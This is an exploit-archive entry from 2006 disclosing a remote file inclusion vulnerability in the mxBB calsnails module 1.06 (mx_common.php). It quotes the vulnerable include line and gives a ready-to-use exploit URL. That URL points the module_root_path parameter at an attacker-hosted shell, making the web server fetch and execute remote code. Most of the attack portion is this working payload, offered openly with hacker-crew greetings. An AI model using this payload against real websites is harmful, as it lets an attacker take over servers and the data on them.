[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability
# Published : 2006-11-17
# Author : bd0rk
# Previous Title : Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability
# Next Title : MosReporter Joomla Component 0.9.3 Remote File Include Exploit
##################################################################
# #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
# #
# Bugfounder: bd0rk || SOH-Crew #
# #
# Website: www.soh-crew.it.tt #
# #
# Gr33tings: nukedx, DeeJay, TheJT, str0ke #
# #
##################################################################
Mod-Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=21
Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);
[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?
# www.Syue.com [2006-11-17]